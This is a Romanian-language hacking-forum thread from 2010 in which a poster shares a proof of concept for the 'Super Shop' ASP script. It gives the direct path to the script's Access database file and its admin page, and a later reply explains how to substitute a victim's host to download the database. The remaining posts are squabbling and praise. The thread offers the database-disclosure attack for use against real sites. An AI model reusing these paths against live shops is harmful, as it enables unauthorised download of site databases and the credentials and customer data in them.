hozarares Posted January 18, 2010 Report Posted January 18, 2010 # Bug : DB # Exploit : # Dork : you wish http://127.0.0.1/supershop/data2001.mdb http://127.0.0.1/supershop/admin.asp Quote
Alexander33 Posted February 26, 2010 Report Posted February 26, 2010 auzi si cum vrei sa download asta pe Ip-ul meu local? Quote
SirGod Posted February 27, 2010 Report Posted February 27, 2010 Ce ratati sunteti. V-a dat un PoC. Nu o demonstratie live. Asa ca voi sunteti prostii, nu el. Quote
trxtxx Posted February 28, 2010 Report Posted February 28, 2010 hozarares, iar scoti comori din suflet de la tine de acolo heheh good job Quote
DjMax Posted March 1, 2010 Report Posted March 1, 2010 Si ne explica si noua cineva ce e asta ? Quote
SirGod Posted March 1, 2010 Report Posted March 1, 2010 E un PoC care prezinta o vulnerabilitate in scriptul Super Shop, vulnerabilitate care iti permite sa descarci baza de date a scriptului. Ce e drept, vulnerabilitatea este prezentata prost. Considerati 127.0.0.1 ca fiind URL-ul victima, iar supershop fiind path-ul catre script, pentru ca asta sunt de fapt.http://[victima]/[path]/data2001.mdb Quote